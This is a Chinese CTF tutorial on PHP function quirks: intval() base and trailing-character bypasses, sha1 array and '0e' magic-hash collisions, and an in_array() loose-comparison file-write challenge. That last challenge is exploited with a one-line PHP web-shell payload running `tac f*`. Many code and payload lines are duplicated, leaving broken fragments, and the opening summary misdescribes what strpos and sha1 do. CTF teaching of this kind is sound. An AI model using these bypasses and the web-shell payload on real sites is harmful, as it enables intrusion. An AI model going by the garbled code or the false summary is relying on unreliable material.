文章摘要
这篇文章主要介绍了PHP中几个常用函数的特性及其在CTF(网络安全竞赛)中的应用。文章围绕`intval()`、`strpos()`和`sha1()`三个函数展开,详细讲解了它们的强类型行为、绕过方法以及在CTF中的实际考察方式。
1. **`intval()`函数**:
- `intval()`用于将字符串或数字转换为整数。
- 在CTF中,它常用于绕过数值比较或类型检查,例如通过传递带有小数点的字符串或使用`base`为0的进制转换。
- 例如,`intval('114514')`返回114514,而`intval(1145.14)`返回1145。
2. **`strpos()`函数**:
- `strpos()`用于在字符串中查找子字符串。
- 在CTF中,`strpos()`常用于强类型比较,例如判断变量是否为字符串。
- 例如,`strpos($num, "0")`会返回字符串类型,而`strpos($num, "0") === 0`会返回整数类型。
3. **`sha1()`函数**:
- `sha1()`用于生成字符串的哈希值。
- 在CTF中,它常用于绕过数组比较检查,例如通过传递数组绕过强类型比较。
- 例如,通过将数值参数转换为数组索引,可以绕过`isset()`或`array_key_exists()`的类型检查。
文章还提到了这些函数在CTF中的常见应用场景,例如通过构造特定的输入参数绕过数值范围、类型检查或哈希比较等安全漏洞。通过理解这些函数的特性,可以更好地应对CTF中的各种挑战。
目录前言intval()strpos()sha1数组比较强类型array_push()结语
上篇文章给大家带来了PHP中最基本的特性,不知道大家学习的怎样了,回顾上文,我们讲了MD5强弱碰撞以及正则匹配的绕过,总体来看还是很简单的,下面给大家带来新的PHP特性讲解,会稍微比上一篇难一些。
上一篇在最后时简单介绍了一下这个函数,我们看看官方是怎样定义的:
简单来说就是让输入的数字变成整数,下面我们举个例子:
echo intval(1145.14); // 1145
echo intval(‘114514’); // 114514
echo intval(‘114514’); // 114514
可以发现只对有小数点的数字起作用,正常的整数还是照常输出,那么它在CTF中是如何考察的呢,查看下面代码:
if($num===”1145″){
die(“no no no!”);
}
if(intval($num,0)===1145){
echo $flag;
}
die(“no no no!”);
}
if(intval($num,0)===1145){
echo $flag;
}
要我们强类型传入的不能等于1145,但后面经过intval函数又要等于1145,这不和前面的矛盾了,我们要怎样做呢?
这里介绍一下intval的特性,如果我们在函数里传入字符串,那么该函数就会返回不是数字的字符之前的数字,也就是说我们传入:
sum=1145a
intval就会判断我们传入的是1145,从而实现了绕过,还有另一种绕过方法:
当base为0时,intval会自动进行进制转换,我们可以传入1145的十六进制形式来绕过。
根据手册可以看到,该函数以及与其类似的函数,作用都是匹配第一个或者最后一个字符,根据该函数特性,题目会经常围绕它作为一个限制头部的点,比如上面那题可能会增加限制:
if(!strpos($num, “0”)){
die(“no no no!”);
die(“no no no!”);
因为八进制开头通常为0,检测到的话就不能通过进制转换来绕过了。
p>该函数的利用以及绕过方法类似于MD5函数,都是运用了PHP特性来做,这里简单看一下:
类似于MD5,在SHA1里我们也可以使用数组绕过,具体可以看下面例子:
if(sha1($a)==sha1($b) && $a!=$b){
echo $flag;
}
echo $flag;
}
可以看到,也是一个弱比较,根据PHP特性sha1函数无法对数组进行处理,,于是我们传入数组来使结果为NULL:
a[]=1
b[]=2
b[]=2
与MD5相同,当然也存在强类型比较,我们不能用数组来进行绕过了:
if(sha1($a)===sha1($b) && $a!=$b){
echo $flag;
}
echo $flag;
}
这里同样有类似于MD5函数的解决方法:
a=aaK1STf //0e7665852665575620768827115962402601
b=aaO8zKZF //0e89257456677279068558073954252716165
b=aaO8zKZF //0e89257456677279068558073954252716165
可以理解为向数组尾部插入参数,我们看看是如何考察的:
<?php
highlight_file(__FILE__);
$allow=array();
for ($i=36; $i < 0x36d; $i++) {
array_push($allow, rand(1,$i));
}
if(isset($_GET[‘n’]) && in_array($_GET[‘n’], $allow)){
file_put_contents($_GET[‘n’], $_POST[‘content’]);
}
?>
highlight_file(__FILE__);
$allow=array();
for ($i=36; $i < 0x36d; $i++) {
array_push($allow, rand(1,$i));
}
if(isset($_GET[‘n’]) && in_array($_GET[‘n’], $allow)){
file_put_contents($_GET[‘n’], $_POST[‘content’]);
}
?>
可以看到题目先向数组里插入随机数,in_array()是搜索数组中是否存在指定的值,根据它的语法:
type会判断类型是否匹配,这就是我们利用的点,因为数组里数据为int型,根据PHP特性比较后字符串会转成int型,也就是说我们传入1.php也是没有问题的,后面有个写入文件操作,正好可以设置一句话木马连接后门,或者进行命令执行:
get: n=1.php
post: content=<?=`tac f*`;
post: content=<?=`tac f*`;
今天这篇文章可能有的地方不是很好理解,但总体来说还是很简单的,PHP特性很多以至于只能挑出一些著名的来说,更多关于CTF PHP特性函数的资料请关注脚本之家其它相关文章!
您可能感兴趣的文章:CTF中的PHP特性函数解析之上篇php反序列化长度变化尾部字符串逃逸(0CTF-2016-piapiapia)Web端测试PHP代码函数覆盖率解决方案php安全攻防世界unserialize函数反序列化示例详解
© 版权声明
文章版权归作者所有,未经允许请勿转载。
